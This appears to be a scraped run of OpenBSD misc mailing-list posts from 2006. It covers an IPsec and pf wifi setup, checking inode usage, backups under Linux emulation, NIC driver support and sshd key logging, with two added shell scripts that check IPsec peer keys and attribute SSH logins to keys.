Lout start: 11 MB (01:10/22) = 5122 sectors
Current Secsize: 2048
ATIP info from disk:
Indicated writing power: 2
Reference speed: 6
Is not unrestricted
Is erasable
Disk sub type: High speed Rewritable (CAV) media (1)
ATIP start of lead in: -11077 (97:34/23)
ATIP start of lead out: 336075 (74:43/00)
1T speed low: 4 1T speed high: 10
2T speed low: 2 2T speed high: 10
power mult factor: 2 6
recommended erase/write power: 5
A1 values: 24 2C DC
A2 values: 14 A4 4A
A3
Re: IBM Thinkpad X40, which model?
Zoong PHAM [EMAIL PROTECTED] wrote: I plan to get a IBM Thinkpad X40 laptop. I can see at least there are 3 different models. I wonder which model is supported best by 3.8 or the coming 3.9. These are all submodels that only differ in processor speed, memory and disk size, and wireless options. Pick according to those criteria or whatever's conveniently available in your part of the world. -- Christian naddy Weisgerber [EMAIL PROTECTED]
Missing patch and security announce
See http://docs.freebsd.org/cgi/mid.cgi?200601251013.k0PAD9lO059018 Fixed in cvs, but NO patch for 3.8 or 3.7 and NO security announce. (http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net/if_bridge.c.diff?r1=1.147r2=1.148) How does this match http://openbsd.org/security.html#disclosure ?
Re: Missing patch and security announce
On Wed, 2006-01-25 at 16:06:55 +0100, Rob W proclaimed... See http://docs.freebsd.org/cgi/mid.cgi?200601251013.k0PAD9lO059018 Fixed in cvs, but NO patch for 3.8 or 3.7 and NO security announce. (http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net/if_bridge.c.diff?r1=1.147r2=1.148) How does this match http://openbsd.org/security.html#disclosure ? Troll, It's usually best to just troll once and wait for a reply.
Re: tutorial for securing wifi networks with ipsec and openbsd, somewhere?
Didier Wiroth [EMAIL PROTECTED] wrote: I've read man ipsec and vpn. Unfortunately I'm totally new to ipsec and have no ipsec experience. I'm looking for tutorials with samples, URLs or anything else, where I can find additional info on how to secure wifi networks with openbsd's: ipsec and authpf.

Okay, this is as good an opportunity as any to write down what I did to my wireless a while ago:

Configure dhcpd on the gateway (172.16.1.1) to always give the same address (172.16.1.99) to my laptop, based on its MAC address.

Exchange public keys: Copy /etc/isakmpd/private/local.pub from the gateway to /etc/isakmpd/pubkeys/ipv4/172.16.1.1 on my laptop, and the laptop's .../local.pub to .../172.16.1.99 on the gateway.

Start up isakmpd -K on both machines. No other isakmpd configuration. None.

On the gateway, create a one-line /etc/ipsec.conf:

    ike esp from any to 172.16.1.99

On the laptop, create a one-line /etc/ipsec.conf:

    ike esp from ral0 to any peer 172.16.1.1

Run ipsecctl -f /etc/ipsec.conf on both machines.

Congratulations, you have set up IPsec. Repeat the same procedure for additional wireless clients.

Wait a moment, you say, does that mean that two hosts on the wireless will talk to each other through the IPsec gateway rather than directly? That's right, but in infrastructure mode, i.e., if you use an access point, the packets already cross the air twice (host 1 - AP - host 2). Looping them through the gateway doesn't add appreciable overhead.

The wireless clients only need to talk ISAKMP (to authenticate and renegotiate keys) and ESP to the gateway. Block everything else on the gateway:

    block return on $wlan all
    pass in on $wlan proto esp to $wlan keep state
    pass out on $wlan proto esp from $wlan keep state
    pass in on $wlan proto udp to $wlan port isakmp keep state
    pass out on $wlan proto udp from $wlan port isakmp keep state

Actually, there is one more thing, and it's important. With the setup above, you will run into MTU issues with hosts behind the gateway. The symptom is that bulk data transfers _to_ the wireless host will be ridiculously slow or stall completely. There must be a better way, but in the meantime TCP clamping on the gateway works:

    scrub in on enc0 all max-mss 1318

As far as pf is concerned, all decoded IPsec traffic is from the enc0 interface. If you use the antispoof directive, make sure to add a pass rule for traffic on enc0.

-- Christian naddy Weisgerber [EMAIL PROTECTED]
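A gateway-side consistency check for the setup described above, as an added example that is not part of the original post: since each wireless client needs both a flow line in /etc/ipsec.conf and a public key file named after its address, the script reports clients that have one without the other. The helper names check_ipsec_peers and make_demo_tree, the second and third client addresses and the placeholder key files are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original post. check_ipsec_peers and
# make_demo_tree are hypothetical helper names.

# check_ipsec_peers ROOT
#   ROOT/etc/ipsec.conf               flows of the form "ike esp from any to <addr>"
#   ROOT/etc/isakmpd/pubkeys/ipv4/    one public key file per client address
# ROOT is empty on a live gateway and a scratch directory in the demo.
# Prints one line per finding; returns 0 if clean, 1 on findings, 2 if no conf.
check_ipsec_peers() {
    root=$1
    conf=$root/etc/ipsec.conf
    keydir=$root/etc/isakmpd/pubkeys/ipv4
    rc=0

    if [ ! -r "$conf" ]; then
        echo "NO-CONF $conf"
        return 2
    fi

    # Client addresses taken from the gateway-style flow lines. Comment
    # lines never match because their first field is not "ike".
    peers=$(awk '$1 == "ike" && $2 == "esp" && $3 == "from" &&
                 $4 == "any" && $5 == "to" { print $6 }' "$conf" |
            sort -u | tr '\n' ' ')

    # A flow whose client has no (or an empty) key file cannot authenticate.
    for ip in $peers; do
        if [ ! -s "$keydir/$ip" ]; then
            echo "MISSING-KEY $ip"
            rc=1
        fi
    done

    # A key file with no flow is usually left over from a removed client.
    for f in "$keydir"/*; do
        [ -f "$f" ] || continue
        ip=${f##*/}
        case " $peers" in
            *" $ip "*) ;;
            *) echo "KEY-WITHOUT-FLOW $ip"; rc=1 ;;
        esac
    done
    return $rc
}

# Build a constructed gateway tree: .99 is complete, .100 has a flow but no
# key, .101 has a key but no flow. Prints the scratch directory.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/isakmpd/pubkeys/ipv4"
    cat > "$d/etc/ipsec.conf" <<'EOF'
# constructed gateway ipsec.conf
ike esp from any to 172.16.1.99
ike esp from any to 172.16.1.100
EOF
    echo "constructed placeholder key" > "$d/etc/isakmpd/pubkeys/ipv4/172.16.1.99"
    echo "constructed placeholder key" > "$d/etc/isakmpd/pubkeys/ipv4/172.16.1.101"
    echo "$d"
}

# Demo run on the constructed tree.
demo=$(make_demo_tree)
check_ipsec_peers "$demo" || true
rm -rf "$demo"
```

On a real gateway the call is `check_ipsec_peers ""`, run after adding or removing a client and before reloading with ipsecctl.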
Re: Missing patch and security announce
it's a minor issue. On 1/25/06, Rob W [EMAIL PROTECTED] wrote: See http://docs.freebsd.org/cgi/mid.cgi?200601251013.k0PAD9lO059018 Fixed in cvs, but NO patch for 3.8 or 3.7 and NO security announce. (http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net/if_bridge.c.diff?r1=1.147r2=1.148) How does this match http://openbsd.org/security.html#disclosure ?
Re: Marvell Yukon 88E8053 PCI-E Gigabit
On Wednesday, 25 January 2006 at 16:20, Adam Dennis wrote: I noticed that openbsd-current doesn't have support for Marvell Yukon88E8053 PCI-E Gigabit (onboard). I have the same if, but not on my OpenBSD-Computer. www.skd.de supports drivers for FreeBSD, Linux, etc. but not for OpenBSD as far as I can see.
view available inodes on partition
Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. Thanks, -Matt-
Re: Missing patch and security announce
This wasn't meant as a Troll - I just want to understand why there isn't a patch available for this. Moreover why there haven't been made a security announce. (I thought that something went wrong with my first message) From: eric [EMAIL PROTECTED] To: Rob W [EMAIL PROTECTED] CC: misc@openbsd.org Subject: Re: Missing patch and security announce Date: Wed, 25 Jan 2006 11:03:21 -0600 On Wed, 2006-01-25 at 16:06:55 +0100, Rob W proclaimed... See http://docs.freebsd.org/cgi/mid.cgi?200601251013.k0PAD9lO059018 Fixed in cvs, but NO patch for 3.8 or 3.7 and NO security announce. (http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net/if_bridge.c.diff?r1=1.147r2=1.148) How does this match http://openbsd.org/security.html#disclosure ? Troll, It's usually best to just troll once and wait for a reply.
Re: Marvell Yukon 88E8053 PCI-E Gigabit
On Wed, 25 Jan 2006, Christoph Fritz wrote: On Wednesday, 25 January 2006 at 16:20, Adam Dennis wrote: I noticed that openbsd-current doesn't have support for Marvell Yukon88E8053 PCI-E Gigabit (onboard). I have the same if, but not on my OpenBSD-Computer. www.skd.de supports drivers for FreeBSD, Linux, etc. but not for OpenBSD as far as I can see. SysKonnect support has gone down hill ever since Marvel bought them. I tried unsuccessfully to get h/w and doc supplied to OBSD devs a little over a year ago, then all of the sudden my old SK contact quit replying. diana
Re: view available inodes on partition
Hello! On Wed, Jan 25, 2006 at 03:04:05PM -0500, Matthew Closson wrote: Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. Thanks, Just read the manual of df. And then look at the option -i. Kind regards, Hannah.
Re: view available inodes on partition
On Wednesday 25 January 2006 20:04, Matthew Closson wrote: Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. Thanks, -Matt- df -i --STeve Andre'
Re: view available inodes on partition
On 2006/01/25 15:04, Matthew Closson wrote: Is there a way to view how many inodes are still available on a partition. df(1).
Re: view available inodes on partition
On Wed, Jan 25, 2006 at 03:04:05PM -0500, Matthew Closson wrote: Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. Thanks, rtfm df(1) cu -- paranoic mickey (my employers have changed but, the name has remained)
Re: view available inodes on partition
On 1/25/06, Matthew Closson [EMAIL PROTECTED] wrote: Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. Thanks, man 1 df
Re: view available inodes on partition
Thanks for all the replies, that obviously worked fine. On Wed, 25 Jan 2006, Otto Moerbeek wrote: On Wed, 25 Jan 2006, Matthew Closson wrote: Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. df -i -Otto
Re: view available inodes on partition
On Wed, 25 Jan 2006, Matthew Closson wrote: Hello, Is there a way to view how many inodes are still available on a partition. I'm decompressing a ton of small files onto a 60Gb onto my /dev/wd1a. And I'm not really concerned about running out of space, but possibly out of inodes, I just used the default parameters creating the filesystem, which is ffs. df -i -Otto
std. paths for IMAP folders
Hi! I guess I can configure things to be any way I want it, but I would like to ask you guys what would be the most common place where users' IMAP folders are to be stored. If all the incoming mail goes to in /var/mail something, is this also the place that would be the best place to let them (us) have their (our) folders? Or perhaps the home directories? TIA, and best regards, /Joakim -- http://www.df.lth.se/~jokke/
Backups under linux emulation
Dear misc: I'm attempting to use (EMC) Legato Networker to backup one of my OpenBSD boxes. Since there's no OpenBSD binary, and Networker isn't open source, I'm using the Linux binary under Linux emulation. The binary executes fine, and the OpenBSD box and Legato server are communicating perfectly. Backups work, but with one major problem: Legato backs up files by crawling the file system, starting at / going into each directory and backing up files as it finds them. The problem that I'm having is that, under linux emulation, the emulator first checks to see if a file/directory exists under /emul/linux. So, when the backup software tries to back up /var, it ends up backing up /emul/linux/var, and my actual /var never gets backed up. I have the same problem in /usr, and so on. Is there some method/way around this problem? How can I make my Linux binary back up the actual /var rather than /emul/linux/var? Thanks for the help. Michael
Re: Marvell Yukon 88E8053 PCI-E Gigabit
On Wednesday, 25 January 2006 at 20:09, Diana Eichert wrote: On Wed, 25 Jan 2006, Christoph Fritz wrote: On Wednesday, 25 January 2006 at 16:20, Adam Dennis wrote: I noticed that openbsd-current doesn't have support for Marvell Yukon88E8053 PCI-E Gigabit (onboard). I have the same if, but not on my OpenBSD-Computer. www.skd.de supports drivers for FreeBSD, Linux, etc. but not for OpenBSD as far as I can see. SysKonnect support has gone down hill ever since Marvel bought them. I tried unsuccessfully to get h/w and doc supplied to OBSD devs a little over a year ago, then all of the sudden my old SK contact quit replying. I wrote to [EMAIL PROTECTED] and got a working driver (source-code) from [EMAIL PROTECTED] for my current Linux 2.6.15 Maybe the linux source is all docu they give out?
Re: SSH publickey authentication - identity logging
From: steven mestdagh [mailto:[EMAIL PROTECTED] On Tue, Jan 24, 2006 at 11:04:33AM -0700, Spruell, Darren-Perot wrote: Would be useful to have information logged for the connection identifying the key used to authenticate, by the key comment if possible. Does sshd already have this capability? Would anyone consider this a useful feature addition? Have you tried LogLevel VERBOSE in sshd_config(5)? That prints lines like 'Found matching DSA key: fingerprint in the log file. Hadn't tried that, but it gives us enough of what we want to work. Thanks for the tip. DS
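The correlation this reply settles on, as an added example that is not part of the original thread: with LogLevel VERBOSE, each "Found matching ... key" line is matched to the "Accepted publickey" line from the same sshd process, and the fingerprint is looked up in a map of key owners. The log lines, fingerprints, owner names and the key_report helper are constructed, and the script assumes both lines carry the same sshd PID and the colon-separated fingerprint format.

```sh
#!/bin/sh
# Added example, not from the original thread. All sample data is constructed;
# fingerprints and owner names are made up.

# Constructed log excerpt: two attributable logins (the first with the
# fingerprint line logged twice), one login with a key missing from the map,
# and one login with no fingerprint line at all.
sample_log() {
    cat <<'EOF'
Jan 24 11:01:19 sftp sshd[23555]: Found matching DSA key: 11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00
Jan 24 11:01:20 sftp sshd[23555]: Found matching DSA key: 11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00
Jan 24 11:01:20 sftp sshd[23555]: Accepted publickey for transfers from 10.2.58.44 port 1420 ssh2
Jan 24 11:05:02 sftp sshd[23601]: Found matching RSA key: a0:a1:a2:a3:a4:a5:a6:a7:a8:a9:aa:ab:ac:ad:ae:af
Jan 24 11:05:02 sftp sshd[23601]: Accepted publickey for transfers from 10.2.58.51 port 2210 ssh2
Jan 24 11:09:40 sftp sshd[23655]: Found matching DSA key: de:ad:be:ef:00:11:22:33:44:55:66:77:88:99:aa:bb
Jan 24 11:09:41 sftp sshd[23655]: Accepted publickey for transfers from 10.2.60.7 port 3301 ssh2
Jan 24 11:12:13 sftp sshd[23702]: Accepted publickey for transfers from 10.2.58.44 port 1466 ssh2
EOF
}

# Constructed "fingerprint owner" map, one key per line. In practice it would
# be built by running ssh-keygen -l -f on each person's public key file.
sample_keys() {
    cat <<'EOF'
11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:00 alice
a0:a1:a2:a3:a4:a5:a6:a7:a8:a9:aa:ab:ac:ad:ae:af bob
EOF
}

# key_report MAPFILE < sshd-log
# Prints "time account source-address fingerprint owner" per accepted login.
key_report() {
    awk -v map="$1" '
    # Pull the process id out of a tag such as sshd[23555]:
    function pid_of(tag) {
        if (match(tag, /\[[0-9]+\]/))
            return substr(tag, RSTART + 1, RLENGTH - 2)
        return ""
    }
    BEGIN {
        while ((getline line < map) > 0) {
            n = split(line, f, " ")
            if (n >= 2) owner[f[1]] = f[2]
        }
        close(map)
    }
    # Remember the most recent fingerprint seen for each sshd process.
    $5 ~ /^sshd\[/ && $6 == "Found" && $7 == "matching" && $9 == "key:" {
        fp[pid_of($5)] = $10
        next
    }
    $5 ~ /^sshd\[/ && $6 == "Accepted" && $7 == "publickey" {
        p = pid_of($5)
        if (!(p in fp)) {
            k = "-"; who = "no-fingerprint-logged"
        } else {
            k = fp[p]
            who = (k in owner) ? owner[k] : "unlisted-key"
        }
        print $3, $9, $11, k, who
        delete fp[p]          # process ids get reused
    }'
}

# Demo run on the constructed data.
map=$(mktemp)
sample_keys > "$map"
sample_log | key_report "$map"
rm -f "$map"
```

The "unlisted-key" and "no-fingerprint-logged" rows are the ones worth reviewing: the first means a key is authorized on the account but nobody is recorded as its owner, the second that the login predates the LogLevel change or the lines were split across log files.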
Re: Marvell Yukon 88E8053 PCI-E Gigabit
On Wednesday, January 25, Christoph Fritz wrote: Maybe the linux source is all docu they give out? Linux source is *not* documentation. --Toby.
Re: Backups under linux emulation
On Wed, 25 Jan 2006, Michael Favinsky wrote: Dear misc: I'm attempting to use (EMC) Legato Networker to backup one of my OpenBSD boxes. Since there's no OpenBSD binary, and Networker isn't open source, I'm There is an openbsd client. We're using it (nwclient-6.0.2-openbsd-i386.tgz). I'm going to ask around to find out how we got it. Apparently it's not supported but works fine. -rick using the Linux binary under Linux emulation. The binary executes fine, and the OpenBSD box and Legato server are communicating perfectly. Backups work, but with one major problem: Legato backs up files by crawling the file system, starting at / going into each directory and backing up files as it finds them. The problem that I'm having is that, under linux emulation, the emulator first checks to see if a file/directory exists under /emul/linux. So, when the backup software tries to back up /var, it ends up backing up /emul/linux/var, and my actual /var never gets backed up. I have the same problem in /usr, and so on. Is there some method/way around this problem? How can I make my Linux binary back up the actual /var rather than /emul/linux/var? Thanks for the help. Michael
Re: Backups under linux emulation
Rick, this is good news. If you can provide me some more info on where you got it I'd be grateful. One thing you should be aware of: 6.0.2 has known vulnerabilities, per http://www.securityfocus.com/bid/14582. I suppose that's the price paid when running older unsupported software. I'd be a bit concerned about installing exploitable 6.0.2 on one of my servers. -Original Message- From: Rick Aliwalas [mailto:[EMAIL PROTECTED] Sent: Wednesday, January 25, 2006 1:25 PM To: Michael Favinsky Cc: misc@openbsd.org Subject: Re: Backups under linux emulation On Wed, 25 Jan 2006, Michael Favinsky wrote: Dear misc: I'm attempting to use (EMC) Legato Networker to backup one of my OpenBSD boxes. Since there's no OpenBSD binary, and Networker isn't open source, I'm There is an openbsd client. We're using it (nwclient-6.0.2-openbsd-i386.tgz). I'm going to ask around to find out how we got it. Apparently it's not supported but works fine. -rick using the Linux binary under Linux emulation. The binary executes fine, and the OpenBSD box and Legato server are communicating perfectly. Backups work, but with one major problem: Legato backs up files by crawling the file system, starting at / going into each directory and backing up files as it finds them. The problem that I'm having is that, under linux emulation, the emulator first checks to see if a file/directory exists under /emul/linux. So, when the backup software tries to back up /var, it ends up backing up /emul/linux/var, and my actual /var never gets backed up. I have the same problem in /usr, and so on. Is there some method/way around this problem? How can I make my Linux binary back up the actual /var rather than /emul/linux/var? Thanks for the help. Michael
Re: std. paths for IMAP folders
On Wed, 25 Jan 2006 21:04:43 +0100, Joakim Roubert wrote: Or perhaps the home directories? Yes, $HOME/something (e.g. $HOME/MAIL/inbox ) is a fine place for incoming mail (and other mboxes/maildirs). Regards, tkniaz
console font size
How does one control appearance of console/fonts on the screen? On one laptop, letters are quite large and console fills entire screen, on another, letters are tiny and the console fills a fraction of the screen. Many thanks! -Igor Generic 3:8
Re: console font size
On Wed, Jan 25, 2006 at 05:45:52PM -0600, Igor Vilensky wrote: How does one control appearance of console/fonts on the screen? On one laptop, letters are quite large and console fills entire screen, on another, letters are tiny and the console fills a fraction of the screen. Check out the man pages for: wsconscfg, wsconsctl, wsfontload Mike
Re: Marvell Yukon 88E8053 PCI-E Gigabit
isn't the openbsd driver derived from the freebsd if_sk? Christoph Fritz [EMAIL PROTECTED] wrote: On Wednesday, 25 January 2006 at 16:20, Adam Dennis wrote: I noticed that openbsd-current doesn't have support for Marvell Yukon88E8053 PCI-E Gigabit (onboard). I have the same if, but not on my OpenBSD-Computer. www.skd.de supports drivers for FreeBSD, Linux, etc. but not for OpenBSD as far as I can see. -- Don Rumsfeld has been chewing on my ankles. -- Dick Cheney
le1: underflow and le1: transmitter disabled errors
Hello- We have OpenBSD 3.5 running as a filtering bridge on our network using two Allied Telesyn AT-2971SX cards. The traffic across the bridge is about 150 Mb/s on average. We are experiencing the following errors in our log files: Jan 25 17:01:03 xxx /bsd: le1: underflow Jan 25 17:01:03 xxx /bsd: le1: transmitter disabled Jan 25 17:01:05 xxx last message repeated 5 times Jan 25 17:01:05 xxx /bsd: le2: transmitter disabled Jan 25 17:01:05 xxx /bsd: le1: transmitter disabled Jan 25 17:01:16 xxx /bsd: le1: underflow Jan 25 17:01:16 xxx /bsd: le1: underflow Jan 25 17:01:17 xxx /bsd: le1: transmitter disabled As you can see these errors are coming very fast. Any information would help. Thank you, Davin Flatten Boot Log: --- Jan 25 08:41:34 xxx /bsd: OpenBSD 3.5 (GENERIC) #34: Mon Mar 29 12:24:55 MST 2004 Jan 25 08:41:34 xxx /bsd: [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC Jan 25 08:41:34 xxx /bsd: cpu0: Intel(R) Pentium(R) III CPU - S 1400MHz (GenuineIntel 686-class) 1.40 GHz Jan 25 08:41:34 xxx /bsd: cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,MMX,FXSR,SSE Jan 25 08:41:34 xxx /bsd: real mem = 267960320 (261680K) Jan 25 08:41:34 xxx /bsd: avail mem = 242130944 (236456K) Jan 25 08:41:34 xxx /bsd: using 3296 buffers containing 13500416 bytes (13184K) of memory Jan 25 08:41:35 xxx /bsd: mainbus0 (root) Jan 25 08:41:35 xxx /bsd: bios0 at mainbus0: AT/286+(00) BIOS, date 05/01/03, BIOS32 rev. 0 @ 0xffe90 Jan 25 08:41:35 xxx /bsd: pcibios0 at bios0: rev. 2.1 @ 0xf/0x1 Jan 25 08:41:35 xxx /bsd: pcibios0: PCI IRQ Routing Table rev. 1.0 @ 0xfc220/176 (9 entries) Jan 25 08:41:35 xxx /bsd: pcibios0: no compatible PCI ICU found: ICU vendor 0x1166 product 0x0201 Jan 25 08:41:35 xxx /bsd: pcibios0: Warning, unable to fix up PCI interrupt routing Jan 25 08:41:35 xxx /bsd: pcibios0: PCI bus #0 is the last bus Jan 25 08:41:35 xxx /bsd: bios0: ROM list: 0xc/0x8000 0xc8000/0x1000 0xc9000/0x4000! 0xec000/0x4000! 
Jan 25 08:41:35 xxx /bsd: pci0 at mainbus0 bus 0: configuration mode 1 (no bios) Jan 25 08:41:35 xxx /bsd: pchb0 at pci0 dev 0 function 0 ServerWorks CNB20HE Host rev 0x23 Jan 25 08:41:35 xxx /bsd: pci1 at pchb0 bus 1 Jan 25 08:41:35 xxx /bsd: em0 at pci1 dev 2 function 0 Intel PRO/1000XT (PWLA8490XT) rev 0x02: irq 7, address: 00:06:5b:8b:31:dc Jan 25 08:41:35 xxx /bsd: em1 at pci1 dev 4 function 0 Intel PRO/1000XT (PWLA8490XT) rev 0x02: irq 5, address: 00:06:5b:8b:31:dd Jan 25 08:41:35 xxx /bsd: ppb0 at pci1 dev 8 function 0 vendor Intel, unknown product 0x309 rev 0x01 Jan 25 08:41:35 xxx /bsd: pci2 at ppb0 bus 2 Jan 25 08:41:35 xxx /bsd: Adaptec AIC-7899F rev 0x01 at pci2 dev 6 function 0 not configured Jan 25 08:41:35 xxx /bsd: Adaptec AIC-7899F rev 0x01 at pci2 dev 6 function 1 not configured Jan 25 08:41:35 xxx /bsd: aac0 at pci1 dev 8 function 1 Dell PERC 3/Di rev 0x01: irq 3 Jan 25 08:41:35 xxx /bsd: aac0: i960RX 100MHz, 128MB, optional battery present (3) Kernel 2.7-1 Jan 25 08:41:35 xxx /bsd: scsibus0 at aac0: 64 targets Jan 25 08:41:35 xxx /bsd: sd0 at scsibus0 targ 0 lun 0: Adaptec, Container #00, SCSI2 0/direct fixed Jan 25 08:41:35 xxx /bsd: sd0: 17351MB, 2212 cyl, 255 head, 63 sec, 512 bytes/sec, 35535780 sec total Jan 25 08:41:36 xxx /bsd: pchb1 at pci0 dev 0 function 1 ServerWorks CNB20HE Host rev 0x01 Jan 25 08:41:36 xxx /bsd: pchb2 at pci0 dev 0 function 2 ServerWorks I/O Bridge rev 0x01 Jan 25 08:41:36 xxx /bsd: pchb3 at pci0 dev 0 function 3 ServerWorks I/O Bridge rev 0x01 Jan 25 08:41:36 xxx /bsd: pci3 at pchb3 bus 3 Jan 25 08:41:36 xxx /bsd: le1 at pci3 dev 8 function 0 AMD 79c970 PCnet-PCI rev 0x36: irq 5 Jan 25 08:41:36 xxx /bsd: le1: address 00:30:84:6f:ea:79 Jan 25 08:41:36 xxx /bsd: le1: 8 receive buffers, 2 transmit buffers Jan 25 08:41:36 xxx /bsd: le2 at pci3 dev 10 function 0 AMD 79c970 PCnet-PCI rev 0x36: irq 3 Jan 25 08:41:36 xxx /bsd: le2: address 00:30:84:71:33:12 Jan 25 08:41:36 xxx /bsd: le2: 8 receive buffers, 2 transmit 
buffers Jan 25 08:41:36 xxx /bsd: vga1 at pci0 dev 12 function 0 ATI Rage XL rev 0x27 Jan 25 08:41:36 xxx /bsd: wsdisplay0 at vga1: console (80x25, vt100 emulation) Jan 25 08:41:36 xxx /bsd: wsdisplay0: screen 1-5 added (80x25, vt100 emulation) Jan 25 08:41:36 xxx /bsd: pchb4 at pci0 dev 15 function 0 ServerWorks CSB5 SouthBridge rev 0x93 Jan 25 08:41:36 xxx /bsd: pciide0 at pci0 dev 15 function 1 ServerWorks CSB5 IDE rev 0x93: DMA Jan 25 08:41:36 xxx /bsd: atapiscsi0 at pciide0 channel 0 drive 0 Jan 25 08:41:36 xxx /bsd: scsibus1 at atapiscsi0: 2 targets Jan 25 08:41:36 xxx /bsd: cd0 at scsibus1 targ 0 lun 0: SAMSUNG, CD-ROM SN-124, N102 SCSI0 5/cdrom removable Jan 25 08:41:36 xxx /bsd: cd0(pciide0:0:0): using PIO mode 4, DMA mode 2, Ultra-DMA mode 2 Jan 25 08:41:36 xxx /bsd: ohci0 at pci0 dev 15 function 2 ServerWorks OSB4/CSB5 USB rev 0x05: irq 11, version 1.0,
make build | securelevel=2
3.9 beta was not fun for me, so I am reinstalling to 3.8 -Stable. For whatever reason I forgot that securelevel was set to 2, but 'make build' is running alright at the moment. Can I also compile ports with securelevel set to 2? Does someone know of a port where I must decrease the securelevel? Usually I install at least nano, tcsh, and kermit. Darrel
Re: make build | securelevel=2
3.9 beta was not fun for me, so I am reinstalling to 3.8 -Stable. For whatever reason I forgot that securelevel was set to 2, but 'make build' is running alright at the moment. Did you have a problem with 3.9-beta that you want to report? Otherwise who knows, you'll probably have the same problem with 3.9-stable a few months from now... and then?
Re: make build | securelevel=2
On 1/25/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: 3.9 beta was not fun for me, so I am reinstalling to 3.8 -Stable. For whatever reason I forgot that securelevel was set to 2, but 'make build' is running alright at the moment. Can I also compile ports with securelevel set to 2? Does someone know of a port where I must decrease the securelevel? Usually I install at least nano, tcsh, and kermit. you can do everything except make release. which means you should ask why you even bother with securelevel 2. if you don't know what it does, don't fiddle with it.
Re: std. paths for IMAP folders
On 25/01/06 22:06, Tomasz Kniaz wrote: Yes, $HOME/something (e.g. $HOME/MAIL/inbox ) is a fine place for incoming mail (and other mboxes/maildirs). Excellent, thanks a lot! Regards, /Joakim -- http://www.df.lth.se/~jokke/
Re: make build | securelevel=2
On Thursday, January 26, 2006, at 00:53AM, Ted Unangst [EMAIL PROTECTED] wrote: On 1/25/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: 3.9 beta was not fun for me, so I am reinstalling to 3.8 -Stable. For whatever reason I forgot that securelevel was set to 2, but 'make build' is running alright at the moment. Can I also compile ports with securelevel set to 2? Does someone know of a port where I must decrease the securelevel? Usually I install at least nano, tcsh, and kermit. you can do everything except make release. which means you should ask why you even bother with securelevel 2. if you don't know what it does, don't fiddle with it. I am *learning* what it does. :) I am planning on make release for tomorrow. Things are great- thanks. Darrel
Re: make build | securelevel=2
On Thursday, January 26, 2006, at 00:20AM, Peter Valchev [EMAIL PROTECTED] wrote: 3.9 beta was not fun for me, so I am reinstalling to 3.8 -Stable. For whatever reason I forgot that securelevel was set to 2, but 'make build' is running alright at the moment. Did you have a problem with 3.9-beta that you want to report? Otherwise who knows, you'll probably have the same problem with 3.9-stable a few months from now... and then? Good point, thanks. I am still troubleshooting and have not thoroughly prepared the information, though. At home, cvs downloads are halting and will time out, but it could be that something changed at my ISP. At work, 3.9 did not find the 'startx' command and /usr/libexec/locate.updatedb failed, too. However, this is on known bad hardware that can actually serve DNS and time. I will update if something potentially interesting happens. Darrel